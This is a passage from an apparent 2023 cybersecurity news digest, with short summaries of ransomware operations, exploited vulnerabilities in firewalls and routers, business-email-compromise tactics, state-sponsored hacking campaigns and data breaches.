    In the campaign observed by the researchers, threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer. In February 2023, eSentire reported another BatLoader campaign targeting users searching for AI tools.“Both AI services are extremely popular but lack first-party standalone apps (i.e., users interface with ChatGPT via their web interface while Midjourney uses Discord). This vacuum has been exploited by threat actors looking to drive AI app-seekers to imposter web pages promoting fake apps.

    Vulnerability in Zyxel Firewalls May Soon Be Widely Exploited (CVE-2023-28771)

    Rapid7 researchers have issued a warning regarding a recently patched command injection vulnerability (CVE-2023-28771) in various Zyxel firewalls. They have published a technical analysis and a Proof of Concept (PoC) script that demonstrates the vulnerability, enabling the attacker to gain a reverse root shell. The affected devices include Zyxel APT, USG FLEX, and VPN firewalls running ZDL firmware versions v4.60 to v5.35, as well as Zyxel ZyWALL/USG gateways/firewalls running ZLD v4.60 to v4.73. These firewall devices perform network traffic monitoring and control, possess VPN and SSL inspection capabilities, and provide additional protection against malware and other threats.

    Phishing Vendor Sells IP Addresses to Duck Anomaly Detection

    A large-scale phishing-as-a-service operation is shifting tactics to allow attackers to avoid anomaly detection by using localized IP addresses, warns Microsoft. The computing giant discovered the provider in 2021 after detecting a phishing campaign that used more than 300,000 domains and unique subdomains in a single run. BulletProofLink, also referred to as BulletProftLink or Anthrax, sells access to phishing kits, email templates, hosting, and automated series "at a relatively low cost.”

    Shifting Tactics Fuel Surge in Business Email Compromise

    Business email fraud continues to rise, with the Federal Bureau of Investigation (FBI) reporting more than 21,000 complaints with adjusted losses over $2.7 billion. Microsoft has observed an increase in sophistication and tactics by threat actors specializing in business email compromise (BEC), including leveraging residential internet protocol (IP) addresses to make attack campaigns appear locally generated. This new tactic is helping criminals further monetize Cybercrime-as-a-Service (CaaS) and has caught federal law enforcement’s attention because it allows cybercriminals to evade “impossible travel” alerts used to identify and block anomalous login attempts and other suspicious account activity.

    CISA Warns of Samsung ASLR Bypass Flaw Exploited in Attacks

    CISA warned last Friday of a security vulnerability affecting Samsung devices which has been used in attacks to bypass Android address space layout randomization (ASLR) protection. ASLR is an Android security feature that randomizes the memory addresses where key app and OS components are loaded into the device's memory. This makes it more difficult for attackers to exploit memory-related vulnerabilities and successfully launch attacks like buffer overflow, return-oriented programming, or other memory-based exploits.

    Trojan-Rigged Phishing Attacks Pepper China-Taiwan Conflict

    New findings reveal a significant increase in cyber espionage attacks targeting Taiwanese organizations, coinciding with recent political tensions. According to research by Trellix, the number of malicious phishing emails aimed at Taiwanese companies surged between April 7 to the 10th of this year. The most affected sectors were networking/IT, manufacturing, and logistics.

    LockBit Leaks 1.5TB of Data Stolen From Indonesia's BSI Bank

    The LockBit ransomware group has leaked 1.5 terabytes of personal and financial data from Bank Syariah Indonesia (BSI) after failed ransom negotiations. The stolen data includes information from approximately 15 million customers and employees of the country's largest Islamic bank. BSI has restored its key banking services under the supervision of Bank Indonesia. BSI initially experienced disruptions due to a cyberattack, but LockBit claims the bank misled customers by attributing the issues to technical maintenance.

    8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency

    The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely. ‘This allows attackers to gain unauthorized access to sensitive data or compromise the entire system,’ Trend Micro researcher Sunil Bharti said in a report published this week. 8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications.

    Hackers Target Vulnerable Wordpress Elementor Plugin After PoC Released

    Hackers are now actively probing for vulnerable Essential Addons for Elementor plugin versions on thousands of WordPress websites in massive Internet scans, attempting to exploit a critical account password reset flaw disclosed earlier in the month. The critical-severity flaw is tracked as CVE-2023-32243 and impacts Essential Addons for Elementor versions 5.4.0 to 5.7.1, allowing unauthenticated attackers to arbitrarily reset the passwords of administrator accounts and assume control of the websites. The flaw that impacted over a million websites was discovered by PatchStack on May 8th, 2023, and fixed by the vendor on May 11th, with the release of the plugin's version 5.7.2.

    Lemon Group Uses Millions of Pre-Infected Android Phones to Enable Cybercrime Enterprise

    Every day, numerous Android phone users worldwide unknowingly contribute to the financial gains of an organization known as the Lemon Group simply by owning their devices. What these users are unaware of is that the Lemon Group has pre-infected their phones even before they purchase them. As a result, the Lemon Group secretly exploits these devices, utilizing them to steal and sell SMS messages and one-time passwords (OTPs), display unwanted advertisements, create online messaging and social media accounts, and carry out various other activities.

    BianLian Skips Encryption On Way To Extortion

    The U.S. cybersecurity agency has warned that the BianLian ransomware group is shifting from malicious encryption to pure extortion. Instead of double extortion, the group now demands a ransom for keeping stolen data secret. The group's change in tactics is likely influenced by the release of a free decryptor by cybersecurity firm Avast. BianLian gains initial access to networks through compromised remote desktop protocol credentials, acquired from brokers or through phishing. They implant a customized backdoor and install remote management tools like TeamViewer.

    MalasLocker Ransomware Targets Zimbra Servers, Demands Charity Donation

    A new ransomware operation is hacking Zimbra servers to steal emails and encrypt files. However, instead of demanding a ransom payment, the threat actors claim to require a donation to charity to provide an encryptor and prevent data leaking. The ransomware operation, dubbed MalasLocker by BleepingComputer, began encrypting Zimbra servers towards the end of March 2023, with victims reporting in both the BleepingComputer and Zimbra forums that their emails were encrypted.

    Cisco Warns of Critical Switch Bugs With Public Exploit Code

    Yesterday, Cisco published an advisory, warning customers of four critical remote code execution vulnerabilities (CVE-2023-20159, CVE-2023-20160, CVE-2023-20161, and CVE-2023-20189) impacting several of its Small Business Series Switches. The four flaws received a CVSS score of 9.8 out of 10 and are due to an improper validation of requests sent to the targeted switches’ web interfaces. A successful exploit of the issues could enable unauthenticated actors to execute arbitrary code with root privileges on targeted devices.

    New ZIP Domains Spark Debate Among Cybersecurity Experts

    Cybersecurity researchers and IT admins have raised concerns over Google's new ZIP and MOV Internet domains, warning that threat actors could use them for phishing attacks and malware delivery. Earlier this month, Google introduced eight new top-level domains (TLD) that could be purchased for hosting websites or email addresses. The new domains are .dad, .esq, .prof, .phd, .nexus, .foo, and for the topic of our article, the .zip and .mov domain TLDs.

    FBI Confirms BianLian Ransomware Switch to Extortion Only Attacks

    A recent collaboration between government agencies in the United States and Australia, led by CISA, has resulted in a joint Cybersecurity Advisory. The advisory highlights the latest tactics, techniques, and procedures (TTPs) employed by the BianLian ransomware group, which has been actively targeting critical infrastructure in both countries since June 2022. As part of the broader #StopRansomware initiative, this advisory draws on investigations conducted by the FBI and the Australian Cyber Security Centre (ACSC) up until March 2023.

    State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered

    Group-IB recently uncovered a previously undocumented attack infrastructure utilized by the SideWinder, a prolific state-sponsored group, to target entities located in Pakistan and China. The infrastructure unearthed encompasses 55 domains and IP addresses which were identified by researchers as phishing domains mimicking various organizations in the news, government, telecommunications, and financial sectors.

    Feds Charge Russian, Chinese Nationals With Illegal Exports

    U.S. federal prosecutors have announced indictments and arrests related to illegal technology exports to Russia, China, and Iran. The cases involve individuals accused of smuggling military and dual-use technology, including tactical military antennas, lasers, pressure sensors, and other electronics. The Biden administration has vowed to crack down on export violations and has created the Disruptive Technology Strike Force. The cases highlight the efforts to prevent advanced technology from falling into the hands of foreign adversaries who may use them to threaten national security and democratic values.

    Hackers Infect TP-Link Router Firmware to Attack EU Entities

    A Chinese state-sponsored hacking group named "Camaro Dragon" infects residential TP-Link routers with a custom "Horse Shell" malware used to attack European foreign affairs organizations. The backdoor malware is deployed in a custom and malicious firmware designed specifically for TP-Link routers so that the hackers can launch attacks appearing to originate from residential networks.

    Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

    During last week’s Black Hat Asia 2023 conference, Israeli industrial cybersecurity firm OTORIO disclosed several vulnerabilities in cloud management platforms associated with three industrial cellular router vendors that could expose OT networks to external attacks. In total 11 vulnerabilities were disclosed, which could enable threat actors to execute code remotely and take control over hundreds of thousands of devices and OT networks. In particular, the flaws impact cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks to remotely manage and operate devices.

    BEC Attackers Spoof CC'd Execs to Force Payment

    Security experts have discovered a fresh advancement in business email compromise tactics aimed at intensifying the recipient's urgency to settle a counterfeit invoice. Referred to as "VIP Invoice Authentication Fraud" by Armorblox, this strategy involves deceptive emails that imitate reputable vendors or familiar third parties regularly receiving payments from the targeted organization. The scammer initiates an invoice request targeting an individual, often in the finance team of the targeted organization. What sets this tactic apart from others is that the scammer also includes the recipient's boss in the email thread, using a fake email domain that closely resembles the boss's actual email address.

    New RA Group ransomware targets U.S. orgs in double-extortion attacks

    A new ransomware group named 'RA Group' is targeting pharmaceutical, insurance, wealth management, and manufacturing firms in the United States and South Korea. The new ransomware operation started in April 2023, when they launched a data leak site on the dark web to publish victims' details and stolen data, engaging in the typical 'double-extortion' tactic used by most ransomware gangs.

    PharMerica Reports Breach Affecting Nearly 6 Million People

    PharMerica, an institutional pharmacy, suffered a significant data breach in March, affecting nearly 6 million current and deceased patients. Hackers, allegedly from the Money Message ransomware group, accessed personal information such as names, birthdates, Social Security numbers, medications, and health insurance details. The group leaked spreadsheets containing patient data on the dark web and also posted internal business documents,

    Open-source Cobalt Strike Port 'Geacon' Used in macOS Attacks

    Geacon, a Go-based implementation of the beacon from the widely abused penetration testing suite Cobalt Strike, is being used more and more to target macOS devices. Both Geacon and Cobalt Strike are utilities that legitimate organizations use to simulate attacks against their networks and improve defenses, but threat actors have also relied on them for attacks.

    CISA Warns of Critical Ruckus Bug Used to Infect Wi-Fi Access Points

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday of a critical remote code execution (RCE) flaw in the Ruckus Wireless Admin panel actively exploited by a recently discovered DDoS botnet. While this security bug (CVE-2023-25717) was addressed in early February, many owners are likely yet to patch their Wi-Fi access points. Furthermore, no patch is available for those who own end-of-life models affected by this issue.

    Enigmatic Hacking Group Operating in Ukraine

    A newly uncovered hacking group with a string of cyberespionage successes is targeting Ukrainian and pro-Russian targets alike, its motivations uncertain in a conflict that offers little to no middle ground. Malwarebytes in a Wednesday blog post dubs the threat actor "Red Stinger," saying the group is the same as the "Bad Magic" threat actor revealed by Kaspersky in March. Malwarebytes says it traced Red Stinger activities back to 2020, while Kaspersky says it spotted the group in October 2022 - the dates suggesting an investment in stealthy techniques and operational security.

    Discord Discloses Data Breach After Support Agent Got Hacked

    Discord, a popular communication platform, recently experienced a data breach after one of its support agents was hacked. The incident was reported by Discord on their official blog. The breach occurred due to unauthorized access to the support agent's account, which allowed the attacker to gain access to certain user data. Discord confirmed that the breach did not affect the entire user database and that only a small portion of users were impacted.

    Researchers Uncover Powerful Backdoor and Custom Implant in Year-Long Cyber Campaign

    Symantec recently disclosed details of a year-long running campaign targeting government, aviation, education, and telecom sectors located in South and Southeast Asia. Dubbed Lancefly, the operation commenced in mid-2022 and continued until the first quarter of 2023. According to researchers, they observed the actors deploying a powerful backdoor dubbed Merdoor, which has been around since 2018.

    XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

    Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. ‘The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis.

    Multinational Tech Firm ABB Hit by Black Basta Ransomware Attack

    ABB, a leading provider of electrification and automation technology, has suffered a Black Basta ransomware attack that has reportedly impacted its business operations. The multinational company, headquartered in Zurich, Switzerland, employs approximately 105,000 workers and recorded $29.4 billion in revenue for 2022. ABB's services include the development of industrial control systems and SCADA systems for energy suppliers and manufacturing.

    Stealthier Version of Linux BPFDoor Malware Spotted in the Wild

    A new, stealthier variant of the Linux malware 'BPFDoor' has been discovered, featuring more robust encryption and reverse shell communications. BPFDoor is a stealthy backdoor malware that has been active since at least 2017 but was only discovered by security researchers around 12 months ago. The malware gets its name from the use of the 'Berkley Packet Filter' (BPF) for receiving instructions while bypassing incoming traffic firewall restrictions.

    Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability

    U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country. The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a joint cybersecurity advisory issued Thursday.

    Fake In-Browser Windows Updates Push Aurora Info-Stealer Malware

    A malvertising campaign was recently detected using an in-browser Windows update simulation to deceive users and distribute the Aurora information-stealing malware. Aurora which is coded in Golang, has been advertised on hacker forums for over a year as a highly capable info stealer with low anti-virus detection rates. The campaign, as reported by Malwarebytes researchers, relies on popunder ads on adult content websites with high traffic to redirect unsuspecting users to a location where they are served malware.

    Feds Warn of Rise in Attacks Involving Veeam Software Flaw

    Federal authorities have issued a warning about an increase in cyberattacks targeting Veeam's backup application in the healthcare sector. The attacks exploit a high-severity vulnerability (CVE-2023-27532) in Veeam Backup & Replication, potentially leading to unauthorized access, data theft, or ransomware deployment. The vulnerability affects all versions of the software and poses a significant threat to healthcare environments that rely on Veeam for protecting and restoring files and applications.

    New Ransomware Decryptor Recovers Data From Partially Encrypted Files

    A new 'White Phoenix' ransomware decryptor allows victims to partially recover files encrypted by ransomware strains that use intermittent encryption. Intermittent encryption is a strategy employed by several ransomware groups that alternates between encrypting and not encrypting chunks of data. This method allows a file to be encrypted much faster while still leaving the data unusable by the victim.

    Microsoft Fixes BlackLotus Vulnerability, Again

    Microsoft issued an optional patch Tuesday as part of its monthly dump of fixes that addresses for the second time a Secure Boot zero-day vulnerability exploited by BlackLotus UEFI malware. In all, the Redmond giant pushed out 38 security fixes in its May patch cycle, addressing three zero-day flaws - two of which are under active exploitation, including the UEFI flaw - and six bugs rated critical. Security researchers earlier this year spotted the BlackLotus bootkit for sale on hacker forums for $5,000.

    Experts Detail New Zero-Click Windows Vulnerability for NTLM Credential Theft

    Cybersecurity researchers have shared details about a now-patched security flaw in Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines. The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023. Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out Microsoft, Exchange servers with the March update omit the vulnerable feature. ‘An unauthenticated attacker on the internet could use the vulnerability to coerce an Outlook client to connect to an attacker-controlled server,’ Barnea said in a report shared with The Hacker News.

    Cybersecurity Firm Dragos Discloses Cybersecurity Incident, Extortion Attempt

    Industrial cybersecurity company Dragos today disclosed what it describes as a "cybersecurity event" after a known cybercrime gang attempted to breach its defenses and infiltrate the internal network to encrypt devices. While Dragos states that the threat actors did not breach its network or cybersecurity platform, they got access to the company's SharePoint cloud service and contract management system” (Bleeping Computer, 2023). "On May 8, 2023, a known cybercriminal group attempted and failed at an extortion scheme against Dragos. No Dragos systems were breached, including anything related to the Dragos Platform," the company said.

    New ‘Greatness’ Service Simplifies Microsoft 365 Phishing Attacks

    The platform Greatness, which offers a phishing-as-a-Service, witnessed a surge in its activities as it focuses on targeting organizations that use Microsoft 365 in the United States, Canada, the U.K., Australia, and South Africa. As a widely cloud-based productivity platform, Microsoft 365 is highly coveted by cybercriminals who seek to pilfer data or login credentials for exploitation in network intrusions. According to a recent report from Cisco Talos, researchers have revealed that the Greatness phishing platform was established in the middle of 2022, with a significant upsurge in its operations in December 2022, and then again in March 2023.

    Critical Ruckus RCE Flaw Exploited By New DDoS Botnet Malware

    A new malware botnet named 'AndoryuBot' is targeting a critical-severity flaw in the Ruckus Wireless Admin panel to infect unpatched Wi-Fi access points for use in DDoS attacks. Tracked as CVE-2023-25717, the flaw impacts all Ruckus Wireless Admin panels version 10.4 and older, allowing remote attackers to perform code execution by sending unauthenticated HTTP GET requests to vulnerable devices. The flaw was discovered and fixed on February 8, 2023. Still, many have not applied the available security updates, while end-of-life models impacted by the security problem will not get a patch.

    Food Distribution Giant Sysco Warns of Data Breach After Cyberattack

    Sysco, a major global food distribution company, has confirmed that its network was breached earlier this year by attackers who stole sensitive information, including business, customer, and employee data. In an internal memo sent to employees on May 3rd and seen by BleepingComputer, the company revealed that customer and supplier data in the U.S. and Canada, as well as personal information belonging to U.S. employees, may have been impacted in the incident.

    Top 5 Password Cracking Techniques Used by Hackers

    Phishing is often stated as the most successful initial access method for both cybercriminals and more sophisticated nation state actors. Gaining access to valid accounts is one of the easiest and most powerful tools for a threat actors. Why spend the resources breaching powerful security tools, when you can simply trick an employee into clicking a bad link, or by cracking their password?

    Multiple Vulnerabilities in Aruba Products Could Allow for Arbitrary Code Execution.

    Multiple vulnerabilities have been discovered in Aruba Products, the most severe of which could allow for arbitrary code execution. Aruba Mobility Conductor is an advanced WLAN deployed as a virtual machine (VM) or installed on an x86-based hardware appliance. Aruba Mobility Controller is a WLAN hardware controller in a virtualized environment managing WLAN Gateways and SD-WAN Gateways that are managed by Aruba Central.

    BEC Campaign via Israel Spotted Targeting Large Multinational Companies

    Abnormal Security researchers have identified a threat group based in Israel that is responsible for a series of business email compromise (BEC) campaigns. The group's primary targets are large and multinational corporations with annual revenue exceeding $10 billion. Since February 2021, the group has launched approximately 350 BEC campaigns, with email attacks directed at employees in 61 countries spanning six continents. The attackers impersonate the targeted employee's CEO and subsequently redirect the communication to a second external persona, typically a mergers and acquisitions attorney who oversees the payment process. In certain cases, when the attack advances to the second state, the perpetrators may ask to switch from email communications to a WhatsApp voice call to expedite the attack and minimize the chances of leaving behind any traceable evidence.

    FBI Seizes 13 More Domains Linked to DDoS-For-Hire Services

    The U.S. Justice Department announced today the seizure of 13 more domains linked to DDoS-for-hire platforms, also known as 'booter' or 'stressor' services. This week's seizures are part of a coordinated international law enforcement effort (known as Operation PowerOFF) to disrupt online platforms allowing anyone to launch massive distributed denial-of-service (DDoS) attacks against any target for the right amount of money.

    Five Takeaways From the Russian Cyber-Attack on Viasat's Satellites

    The cyber-attack on US firm Viasat’s KA-SAT satellites in Ukraine on February 24, 2022, prompted one of the largest formal attributions of a cyber-attack to a nation-state in history. Nearly 20 countries accused Russia of being responsible, including a dozen EU member states and the Five Eyes countries (US, UK, Australia, New Zealand and Canada). This cyber intrusion, which preceded Russia’s invasion of its neighbor by just a few hours, was thoroughly discussed during the third edition of CYSAT, an event dedicated to cybersecurity in the space industry that took place in Paris, France on April 26-27, 2023.

    Western Digital Says Hackers Stole Customer Data in March Cyberattack

    Western Digital Co. has taken its store offline and sent customers data breach notifications after confirming that hackers stole sensitive personal information in a March cyberattack. The company emailed the data breach notifications late Friday afternoon, warning that customers' data was stored in a Western Digital database stolen during the attack.

    Fleckpe Trojan Infects 620K Devices via Google Play

    The Google Play store was found to have hosted Android malware disguised as legitimate applications, which have been downloaded over 620,000 times since 2022. The malicious apps were disguised as photo-editing apps, camera editors and smartphone wallpaper packs, and infected 11 legitimate applications before being taken down. Once downloaded, the malware executes a payload from the app asset, which sends the infected device's mobile code to a command-and-control server. The server then sends a paid subscription page, which the Trojan opens in an invisible web browser to subscribe the user.

    Meet Akira — A New Ransomware Operation Targeting the Enterprise

    The Akira ransomware operation is gradually expanding its list of victims by infiltrating corporate networks globally, encrypting files, and demanding ransoms amounting to millions of dollars. The operation began in March 2023 and has already targeted 16 companies in diverse industries such as finance, education, real estate, manufacturing, and consulting. Although there was ransomware named Akira released in 2017, there is no connection between these two operations.

    MSI’s Firmware, Intel Boot Guard Private Keys Leaked

    The cybercriminals who breached Taiwanese multinational MSI last month have apparently leaked the company’s private code signing keys on their dark web site. MSI (Micro-Star International) is a corporation that develops and sells computers (laptops, desktops, all-in-one PCs, servers, etc.) and computer hardware (motherboards, graphics cards, PC peripherals, etc.). The company confirmed in early April that it had been hacked. A ransomware group called Money Message claimed responsibility for the breach, said they grabbed (among other things) some of the company’s source code, and asked for $4 million to return/delete it.

    New Cactus Ransomware Encrypts Itself to Evade Antivirus

    Researchers at Kroll corporate investigation have uncovered a new ransomware operation dubbed Cactus which is exploiting known vulnerabilities in Fortinet VPN appliances to gain initial access to the networks of large commercial entities. What’s more is that this group employs an unusual tactic of evading defenses and scanning from antivirus solutions.

    Kimsuky Hackers Use New Recon Tool to Find Security Gaps

    The Kimusky hacking group, known by aliases such as Thalium and Velvet Chollima, has been using a new version of its reconnaissance malware called ReconShark to conduct a cyberespionage campaign on a global scale. According to Sentinel Labs, the group has broadened its target range to include government organizations, research centers, universities, and think tanks in the US, Europe, and Asia. South Korean and German authorities warned in March 2023 that Kimusky had distributed malicious Chrome extensions and Android spyware as a remote access trojan to target Gmail accounts. Kaspersky previously reported in August 2022 that the group had targeted politicians, diplomats, university professors, and journalists in South Korea using a multi-stage target validation scheme to ensure the successful infection of only valid targets.

    Microsoft Patches Serious Azure Cloud Security Flaws

    Microsoft has patched three vulnerabilities in its Azure cloud platform that could have allowed attackers to access sensitive info on a targeted service, deny access to the server, or scan the internal network to mount further attacks, researchers have found. Researchers from the Ermetic Research Team discovered the flaws in the Azure API Management Service, which allows organizations to create, manage, secure, and monitor APIs across all of their environments, they revealed in a blog post published Thursday.

    Russian Hackers Use WinRAR to Wipe Ukraine State Agency’s Data

    The Russian 'Sandworm' hacking group has been linked to an attack on Ukrainian state networks where WinRar was used to destroy data on government devices. In a new advisory, the Ukrainian Government Computer Emergency Response Team (CERT-UA) says the Russian hackers used compromised VPN accounts that weren't protected with multi-factor authentication to access critical systems in Ukrainian state networks. Once they gained access to the network, they employed scripts that wiped files on Windows and Linux machines using the WinRar archiving program.

    City of Dallas Hit by Royal Ransomware Attack Impacting It Services

    The City of Dallas, Texas, has suffered a Royal ransomware attack, causing it to shut down some of its IT systems to prevent the attack's spread. Dallas is the ninth largest city in the United States, with a population of approximately 2.6 million people, according to US census data. Local media reported that the City's police communications and IT systems were shut down Monday morning due to a suspected ransomware attack. This has led to 911 dispatchers having to write down received reports for officers rather than submit them via the computer-assisted dispatch system. The Dallas County Police Department's website was also offline for part of the day due to the security incident but has since been restored

    Hackers Start Using Double DLL Sideloading to Evade Detection

    A group of hackers, also known as Dragon Breath, Golden Eye Dog, or APT-Q-27, is utilizing multiple sophisticated versions of the traditional DLL sideloading technique to avoid detection. These attack variations start with an initial approach that uses legitimate applications, such as Telegram, to sideload a second-stage payload, which may also be legitimate, and in turn, loads a malicious malware loader DLL.

    Google Chrome Will Lose the “Lock” Icon for HTTPS-Secured Sites

    n September 2023, Google Chrome will stop showing the lock icon when a site loads over HTTPS, partly due to the now ubiquitous use of the protocol. It took many years, but the unceasing push by Google, other browser makers and Let’s Encrypt to make HTTPS the norm for accessing resources on the Web resulted in an unmitigated success; according to Google, over 95% of page loads in Chrome on Windows are now over an encrypted, secure channel using HTTPS.

    FBI Seizes 9 Crypto Exchanges Used to Launder Ransomware Payments

    In a recent announcement from the FBI, the agency stated it carried out an operation alongside with the Virtual Currency Response Team, the National Police of Urkaine, and legal prosecutors in the country to seize several cryptocurrency exchange sites that were being used by scammed and cybercriminals, including ransomware actors to launder money from victims.

    Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software

    Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers. BGP is a gateway protocol that's designed to exchange routing and reachability information between autonomous systems. It's used to find the most efficient routes for delivering internet traffic. The three vulnerabilities reside in version 8.4 of FRRouting, a popular open source internet routing protocol suite for Linux and Unix platforms.

    APT41 Subgroup Plows Through Asia-Pacific, Utilizing Layered Stealth Tactics

    APT41 is a well-known Chinese cyber threat that is made up of various subgroups. The group has previously used a variety of tactics over the years to carry out espionage attacks against government agencies, businesses, and individuals. The group's attacks against the US government have led to indictments of its members by US law enforcement. On May 2, Trend Micro researchers reported that Earth Longzhi, a suspected subgroup of APT41, has launched a new campaign after almost a year of inactivity with more advanced stealth tactics to carry out espionage campaigns against the same types of targets.

    T-Mobile Discloses Second Data Breach Since the Start of 2023

    T-Mobile disclosed the second data breach of 2023 after discovering that attackers had access to the personal information of hundreds of customers for more than a month, starting late February 2023. Compared to previous data breaches reported by T-Mobile, the latest of which impacted 37 million people, this incident affected only 836 customers.

    Apple’s First Rapid Security Response Patch Fails to Install on iPhones

    Apple has launched the first Rapid Security Response (RSR) patches for iOS 16.4.1 and macOS 13.3.1 devices. As the company describes in a recently published support document, RSR patches are small-sized updates that target the iPhone, iPad, and Mac platforms and patch security issues between major software updates. Some of these out-of-band security updates may also be used to address vulnerabilities actively exploited in attacks.

    New LOBSHOT Malware Gives Hackers Hidden VNC Access to Windows Devices

    A newly discovered malware named 'LOBSHOT' can discreetly take control of Windows devices using hVNC and is being distributed through Google Ads. Cybersecurity researchers had earlier reported an increase in threat actors using Google ads to distribute malware through fake websites for popular applications such as 7-ZIP, VLC, OBS, Notepad ++, CCleaner, TradingView, Rufus, and others. These malicious sites pushed malware, including Gozi, RedlLine, Vidar, Cobalt Strike, SectoRAT, and the Royal Ransomware, instead of the intended applications.

    Killer Use Cases for AI Dominate RSA Conference Discussions

    Pre-RSA social media gaming predicted it. Many predicted they would loath it. And it happened: Discussions at this year's RSA conference again and again came back to generative artificial intelligence - but with a twist. Even some of the skeptics professed their conversion to the temple of AI, whose overlord, for better or worse, is poised to preside over human activity with indifference about good or evil intent. Count Israeli cryptographer Adi Shamir - the S in the RSA cryptosystem - as a convert. One year ago, speaking at RSA, he thought AI might have some defense use cases but didn't see it being an offensive threat.

    APT28 Targets Ukrainian Government Entities with Fake "Windows Update" Emails

    The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country. The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy. The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates.

    Hackers Target Vulnerable Veeam Backup Servers Exposed Online

    According to researchers at WithSecure, a Finnish cybersecurity and privacy company, threat actors have been leveraging a recently fixed vulnerability in Veeam Backup and Replication software to target unpatched Veeam backup servers. The vulnerability in question is being tracked as CVE-2023-27532 and allows unauthenticated users in the backup infrastructure to obtain encrypted credentials stored in the VeeamVBR configuration database.

    One Brooklyn Reports Breach, Faces Lawsuit Post-Cyberattack

    A safety net hospital system in New York City faces a proposed class action lawsuit tied to a late 2022 cybersecurity incident that breached the personal information of more than 235,000 patients. The incident affected three One Brooklyn Health System hospitals and several other facilities. First discovered on Nov 19, 2022, the incident caused patient rerouting and disrupted access to electronic health records and patient portals for more than a month.

    Hackers Leak Images to Taunt Western Digital’s Cyberattack Response

    The ransomware group known as ALPHV or BlackCat has shared screenshots of internal emails and video conferences taken from Western Digital's systems. This suggests that the hackers maintained access to the company's networks even as Western Digital worked to address the cyber attack. The leak occurred after the group had issued a warning to Western Digital on April 17, stating they would escalate their actions until the company paid a ransom or could no longer withstand the consequences.

    Cold Storage Giant Americold Outage Caused by Network Breach

    Americold, a leading cold storage and logistics company, has been facing IT issues since its network was breached on Tuesday night. The company said it contained the attack and is now investigating the incident that also affected operations per customer and employee reports. It also estimated that its systems will be down until at least next week.

    Vietnamese Hackers Linked to 'Malverposting' Campaign

    According to a recent blog post by Guardio Labs, a Vietnamese threat actor is conducting a malverposting campaign, which has been ongoing for several months. It's estimated that this campaign has infected more than 500,000 devices worldwide within the last three months alone. Malverposting is the act of using social media posts and tweets to spread malicious software and other security threats. In this instance, the attacker abused Facebook's Ad service to distribute malware. Guardio Labs' head of cyber security, Nati Tal, stated that the high number of infections was made possible by using Facebook's Ad service as the initial delivery mechanism.

    Hackers Exploit TP-Link N-Day Flaw to Build Mirai Botnet

    Researchers from the Trend Micro's Zero Day Initiative said telemetry from Eastern Europe indicates that Mirai operators are exploiting a flaw in the TP-Link Archer AX21 firmware. The bug, CVE-2023-1389, allows attackers to inject a command into the router web management interface. A handful of teams competing in the December 2022 Pwn2Own competition in Toronto identified the flaw.

    New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets

    Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer. ‘The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password,’ Cyble researchers said in a technical report.

    Linux Version of RTM Locker Ransomware Targets VMware ESXi Servers

    In a new report by Uptycs, researchers analyzed a Linux variant of the RTM Locker that is based on the leaked source code of the now-defunct Babuk ransomware. The RTM Locker Linux encryptor appears to be created explicitly for attacking VMware ESXi systems, as it contains numerous references to commands used to manage virtual machines. When launched, the encryptor will first attempt to encrypt all VMware ESXi virtual machines by first gathering a list of running VMs. The encryptor then terminates all running virtual machines and starts to encrypt files that have the following file extensions - .log (log files), .vmdk (virtual disks), .vmem (virtual machine memory), .vswp (swap files), and .vmsn (VM snapshots). All of these files are associated with virtual machines running on VMware ESXi. Like Babuk, RTM uses a random number generation and ECDH on Curve25519 for asymmetric encryption, but instead of Sosemanuk, it relies on ChaCha20 for symmetric encryption.

    Zyxel Fixed a Critical RCE Flaw in its Firewall Devices and Urges Customers to Install the Patches

